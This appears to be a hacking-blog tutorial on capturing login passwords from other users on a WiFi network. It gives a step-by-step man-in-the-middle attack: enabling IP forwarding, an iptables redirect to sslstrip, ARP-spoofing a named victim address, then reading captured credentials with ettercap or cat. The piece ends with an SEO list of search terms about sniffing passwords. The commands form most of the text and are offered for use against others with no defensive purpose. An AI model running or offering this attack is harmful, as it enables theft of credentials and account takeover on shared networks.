Hello Guys, Today I’m Going to Guide you how to sniff the SSL password over Wireless “WiFi” . This is so easy but you must have a general knowledge of computer and linux. for better and stable use i recommended to use backtrack 5 r1 or r2 linux. So connect to a network over wifi.
Tools Required ( this is for linux )
ArpSpoof
SSLStrip
Ettercap
SSLStrip
Ettercap
Step 1:
[box_light]echo 1 >/proc/sys/net/ipv4/ip_forward[/box_light]
Step 2:
[box_light] iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 10000[/box_light]
Step 3:
[box_light] sslstrip -l 10000 -w data[/box_light]
Step 4:
[box_light]arpspoof -i wlan0 -t 192.168.1.158 192.168.1.1[/box_light]Once the ARP spoof begins, just sit back and wait as everything is recorded in our “data” file. Once you think someone might have logged into an SSL encrypted site, kill arpspoof and SSLstrip. Now take a look what we have captured.
Step 5:
[box_light]ettercap -T -q -i wlan0[/box_light]or
Step 5:
[box_light]cat data[/box_light]and finally we got this 
Incoming search terms:
- Fastest Password Cracker oclHashcat-plus v0 08 download (12)
- backtrack 5 r2-sniff ssl https passwords (4)
- script sniff all computer under network with backtrack 5 (3)
- backtrack network sniff (2)
- script mitm https backtrack 5 (2)
- sniff computer (2)
- sniffer backtrack 5 r3 (1)
- sniff ssl windows (1)
- sniff ssl password in linux (1)
- sniff https passwords in backtrack 6 (1)
